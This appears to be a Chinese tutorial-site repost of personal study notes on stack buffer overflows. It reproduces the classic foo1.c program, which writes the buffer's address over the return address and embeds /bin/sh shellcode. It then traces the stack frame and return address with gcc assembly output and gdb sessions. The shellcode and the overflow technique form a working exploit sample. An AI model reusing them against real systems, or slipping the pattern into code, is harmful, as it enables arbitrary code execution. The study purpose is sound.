明輝手游網(wǎng)中心:是一個免費提供流行視頻軟件教程、在線學(xué)習(xí)分享的學(xué)習(xí)平臺!

緩沖區(qū)溢出學(xué)習(xí)筆記

[摘要]以前很少用gdb分析代碼, 這回找個最簡樸的shellcode練練, 順便關(guān)稅, 見笑 1.前輩代碼 (<<緩沖區(qū)溢出機理分析>>) /*foo1.c ...

以前很少用gdb分析代碼, 這回找個最簡樸的shellcode練練, 順便關(guān)稅, 見笑

 

1.前輩代碼 (<<緩沖區(qū)溢出機理分析>>)

/*foo1.c

 *

 */

char shellcode[] =

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

"\x80\xe8\xdc\xff\xff\xff/bin/sh";

 

char large_string[128];

 

void main() {

char buffer[96];

int i;

long *long_ptr = (long *) large_string;

 

for (i = 0; i < 32; i++)

*(long_ptr + i) = (int) buffer;

 

for (i = 0; i < strlen(shellcode); i++)

large_string[i] = shellcode[i];

 

strcpy(buffer,large_string);

}

 

2 初始

 

緩沖區(qū)溢出的原理略, 這里我先gcc -S she.c 看了一下main的開頭匯編

--------------------------------

main:

   pushl %ebp           /*在這里開始main */

   movl %esp,%ebp

   subl $104,%esp       /*buffer+i+long_ptr的總長度是104,

                        在這里esp一下從ebp移到了棧尾, 實在

                        就是long_ptr所在處*/

   pushl %esi

   pushl %ebx

   movl $large_string,-104(%ebp) /*用gdb來break main時斷點設(shè)到了這一行*/

用gdb分析得到現(xiàn)在的堆棧情況是

------------------------------------------------------------------

          esp

var:      

低端內(nèi)存   [long_ptr][i][buffer...][ebp][ret][str..]    高端內(nèi)存

len:(byte)    4      4    96        4    4

------------------------------------------------------------------

在這個點上gdb輸出是

-----------------------

(gdb) print &buffer

$6 = (char (*)[96]) 0xbffffac8

(gdb) info regist ebp

ebp            0xbffffb28       -1073743064

(gdb)

 

這和上圖是一致的

而ret

-------------------

(gdb)x 0xbfffb2c /*ebp+4對應(yīng)ret*/

0xbffffb2c:     0x400329cb

(gdb)disassem 0x400329cb

Dump of assembler code for function __libc_start_main:

0x400328cc <__libc_start_main>: push   %ebp

0x400328cd <__libc_start_main+1>:       mov    %esp,%ebp

.....

0x400329c6 <__libc_start_main+250>:     mov    0x8(%ebp),%ecx

0x400329c9 <__libc_start_main+253>:     call   *%ecx

0x400329cb <__libc_start_main+255>:     push   %eax

0x400329cc <__libc_start_main+256>:     call   0x40032234

 

gdb輸出了數(shù)行l(wèi)ibc_start_main的代碼, ret的0x400329cb的確指向

了call main后的下一指令

當然在這一時刻可以跳過溢出代碼, 這樣

------------------------

(gdb) b *0x400329cb  /*設(shè)在正常返回的libc_start_main里*/

Breakpoint 2 at 0x400329cb: file ../sysdeps/generic/libc-start.c, line 92.

(gdb) return      /*假如不是return而是fin,溢出代碼一執(zhí)行, 就到不了這里了*/

Make main return now? (y or n) y

    main=0x8048400 <main>, argc=1, argv=0xbffffb74, init=0x80482c0 <_init>,

                                                     ~~~~~~~~~~_init()

    fini=0x80484bc <_fini>, rtld_fini=0x4000ae60 <_dl_fini>,

    stack_end=0xbffffb6c) at ../sysdeps/generic/libc-start.c:92

92      ../sysdeps/generic/libc-start.c: No such file or directory.

(gdb) info register eip

eip            0x400329cb       1073949131

-----------------------

eip恰是上面的ret傳來的

這里我們還可以看到libc_start_main在main啟動前call了init,還有個fini是在main之后

了?不會, 我是從

main返回到這的阿!

(gdb)disassem 0x80482c0

---------------------------------------

Dump of assembler code for function _init:

0x80482c0 <_init>:      push   %ebp

0x80482c1 <_init+1>:    mov    %esp,%ebp

0x80482c3 <_init+3>:    push   %ebx

0x80482c4 <_init+4>:    call   0x80482c9 <_init+9>

0x80482c9 <_init+9>:    pop    %ebx

0x80482ca <_init+10>:   add    $0x127b,%ebx

0x80482d0 <_init+16>:   cmpl   $0x0,0x20(%ebx)

0x80482d7 <_init+23>:   je     0x80482de <_init+30>

0x80482d9 <_init+25>:   call   0x0

0x80482de <_init+30>:   mov    %esi,%esi

0x80482e0 <_init+32>:   call   0x80483d0 <frame_dummy>

0x80482e5 <_init+37>:   call   0x8048490 <__do_global_ctors_aux>

0x80482ea <_init+42>:   mov    0xfffffffc(%ebp),%ebx

0x80482ed <_init+45>:   leave

0x80482ee <_init+46>:   ret

End of assembler dump.

-----------------------------------------

這段代碼誰知道什么意思?不外似乎跑題了, 回到shellcode吧!

 


上面是電腦上網(wǎng)安全的一些基礎(chǔ)常識,學(xué)習(xí)了安全知識,幾乎可以讓你免費電腦中毒的煩擾。